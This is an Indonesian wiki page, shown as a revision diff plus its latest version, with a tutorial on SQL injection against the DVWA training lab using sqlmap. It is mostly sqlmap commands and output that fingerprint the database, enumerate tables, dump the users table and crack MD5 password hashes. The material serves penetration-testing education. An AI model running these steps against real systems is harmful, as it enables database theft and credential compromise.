Difference between revisions of "DVWA: Exploit menggunakan sqlmap"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 5: | Line 5: | ||
http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit# | http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit# | ||
| − | Enumerating database (-f) | + | ==Enumerating database (-f)== |
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f | ||
| Line 19: | Line 19: | ||
| − | Fingerprinting database (-b) | + | ==Fingerprinting database (-b)== |
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b | ||
| Line 32: | Line 32: | ||
banner: '5.7.11-0ubuntu6' | banner: '5.7.11-0ubuntu6' | ||
| + | ==List databases (--dbs)== | ||
| + | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs | ||
| − | + | Hasilnya kira-kira | |
| − | + | [09:48:29] [INFO] the back-end DBMS is MySQL | |
| + | web server operating system: Linux Ubuntu 16.04 (xenial) | ||
| + | web application technology: Apache 2.4.18 | ||
| + | back-end DBMS: MySQL 5 | ||
| + | [09:48:29] [INFO] fetching database names | ||
| + | available databases [5]: | ||
| + | [*] dvwa | ||
| + | [*] information_schema | ||
| + | [*] mysql | ||
| + | [*] performance_schema | ||
| + | [*] sys | ||
| − | |||
| − | + | ==Cek tables di Database (-D namadatabase --tables)== | |
| − | + | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables | |
| − | + | Hasilnya kira-kira | |
| − | + | 09:50:45] [INFO] the back-end DBMS is MySQL | |
| − | + | web server operating system: Linux Ubuntu 16.04 (xenial) | |
| − | + | web application technology: Apache 2.4.18 | |
| − | + | back-end DBMS: MySQL 5 | |
| + | [09:50:45] [INFO] fetching tables for database: 'dvwa' | ||
| + | Database: dvwa | ||
| + | [2 tables] | ||
| + | +-----------+ | ||
| + | | guestbook | | ||
| + | | users | | ||
| + | +-----------+ | ||
| − | + | ==Lihat struktur data sebuah tabel (-T namatabel --columns)== | |
| − | + | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns | |
| − | + | Hasilnya kira-kira | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | [09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa' | |
| + | Database: dvwa | ||
| + | Table: users | ||
| + | [8 columns] | ||
| + | +--------------+-------------+ | ||
| + | | Column | Type | | ||
| + | +--------------+-------------+ | ||
| + | | user | varchar(15) | | ||
| + | | avatar | varchar(70) | | ||
| + | | failed_login | int(3) | | ||
| + | | first_name | varchar(15) | | ||
| + | | last_login | timestamp | | ||
| + | | last_name | varchar(15) | | ||
| + | | password | varchar(32) | | ||
| + | | user_id | int(6) | | ||
| + | +--------------+-------------+ | ||
| − | + | ==Dump Password (-C password --dump)== | |
| − | + | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump | |
| − | |||
| − | + | Hasilnya kira-kira, | |
| − | |||
| − | |||
| + | Database: dvwa | ||
| + | Table: users | ||
| + | [5 entries] | ||
| + | +---------------------------------------------+ | ||
| + | | password | | ||
| + | +---------------------------------------------+ | ||
| + | | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | | ||
| + | | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | ||
| + | | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | ||
| + | | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | | ||
| + | | e99a18c428cb38d5f260853678922e03 (abc123) | | ||
| + | +---------------------------------------------+ | ||
| + | [09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv' | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | Atau yang lebih lengkap dapat menggunakan perintah | |
| − | + | sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa -T users --dump | |
| − | + | Hasilnya kira-kira, | |
| − | + | Database: dvwa | |
| − | ./ | + | Table: users |
| − | + | [5 entries] | |
| − | + | +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | |
| − | + | | user_id | avatar | user | password | last_name | first_name | last_login | failed_login | | |
| − | + | +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | |
| − | + | | 1 | http://192.168.0.100/DVWA-1.9/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2017-04-17 19:15:11 | 0 | | |
| − | + | | 2 | http://192.168.0.100/DVWA-1.9/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2017-04-17 19:15:11 | 0 | | |
| − | + | | 3 | http://192.168.0.100/DVWA-1.9/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2017-04-17 19:15:11 | 0 | | |
| − | + | | 4 | http://192.168.0.100/DVWA-1.9/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2017-04-17 19:15:11 | 0 | | |
| + | | 5 | http://192.168.0.100/DVWA-1.9/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2017-04-17 19:15:11 | 0 | | ||
| + | +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | ||
| − | + | Seperti yang bisa kita lihat dari gambar di atas sqlmap berhasil menghack password hash pada kolom password dan berhasil memecahkannya dengan menggunakan dictionary attack. Sekarang kita punya dan password bersama dengan username dari pengguna DVWA yang berarti database dan aplikasi tersebut telah jebol sepenuhnya. | |
| − | + | ==Penutup== | |
| − | + | Dalam tutorial ini kita melihat seberapa efektif alat sqlmap ketika kita harus mengidentifikasi dan memanfaatkan kerentanan injeksi SQL. Tentu saja cara yang tepat untuk memanfaatkan kerentanan SQL Injection secara manual. Namun dalam banyak tes penetrasi karena kendala waktu penggunaan sqlmap adalah perlu. | |
| − | + | Khususnya dalam hal ini sqlmap berhasil mengemerasi database dengan sukses dan mengekstrak data dari tabel database dengan sangat cepat. Tentu saja sqlmap memiliki lebih banyak kemampuan seperti itu yang bisa mengecek adanya WAF (Web Application Firewall), IDS dan IPS. Karena bisa menjalankan perintah sistem operasi. Untuk semua alasan ini alat ini harus berada di toolkit setiap penetrasi tester. | |
Latest revision as of 10:24, 3 May 2017
Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/
URL DVWA yang di serang
http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#
Enumerating database (-f)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f
Hasilnya kira-kira
[09:38:21] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: active fingerprint: MySQL >= 5.5.0
comment injection fingerprint: MySQL 5.7.11
html error message fingerprint: MySQL
Fingerprinting database (-b)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b
Hasilnya kira-kira
[09:41:30] [WARNING] reflective value(s) found and filtering out web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5 banner: '5.7.11-0ubuntu6'
List databases (--dbs)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs
Hasilnya kira-kira
[09:48:29] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [09:48:29] [INFO] fetching database names available databases [5]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] sys
Cek tables di Database (-D namadatabase --tables)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables
Hasilnya kira-kira
09:50:45] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [09:50:45] [INFO] fetching tables for database: 'dvwa' Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
Lihat struktur data sebuah tabel (-T namatabel --columns)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns
Hasilnya kira-kira
[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa' Database: dvwa Table: users [8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +--------------+-------------+
Dump Password (-C password --dump)
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump
Hasilnya kira-kira,
Database: dvwa Table: users [5 entries] +---------------------------------------------+ | password | +---------------------------------------------+ | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | | e99a18c428cb38d5f260853678922e03 (abc123) | +---------------------------------------------+ [09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'
Atau yang lebih lengkap dapat menggunakan perintah
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa -T users --dump
Hasilnya kira-kira, Database: dvwa Table: users [5 entries] +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | user_id | avatar | user | password | last_name | first_name | last_login | failed_login | +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | 1 | http://192.168.0.100/DVWA-1.9/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2017-04-17 19:15:11 | 0 | | 2 | http://192.168.0.100/DVWA-1.9/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2017-04-17 19:15:11 | 0 | | 3 | http://192.168.0.100/DVWA-1.9/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2017-04-17 19:15:11 | 0 | | 4 | http://192.168.0.100/DVWA-1.9/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2017-04-17 19:15:11 | 0 | | 5 | http://192.168.0.100/DVWA-1.9/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2017-04-17 19:15:11 | 0 | +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
Seperti yang bisa kita lihat dari gambar di atas sqlmap berhasil menghack password hash pada kolom password dan berhasil memecahkannya dengan menggunakan dictionary attack. Sekarang kita punya dan password bersama dengan username dari pengguna DVWA yang berarti database dan aplikasi tersebut telah jebol sepenuhnya.
Penutup
Dalam tutorial ini kita melihat seberapa efektif alat sqlmap ketika kita harus mengidentifikasi dan memanfaatkan kerentanan injeksi SQL. Tentu saja cara yang tepat untuk memanfaatkan kerentanan SQL Injection secara manual. Namun dalam banyak tes penetrasi karena kendala waktu penggunaan sqlmap adalah perlu.
Khususnya dalam hal ini sqlmap berhasil mengemerasi database dengan sukses dan mengekstrak data dari tabel database dengan sangat cepat. Tentu saja sqlmap memiliki lebih banyak kemampuan seperti itu yang bisa mengecek adanya WAF (Web Application Firewall), IDS dan IPS. Karena bisa menjalankan perintah sistem operasi. Untuk semua alasan ini alat ini harus berada di toolkit setiap penetrasi tester.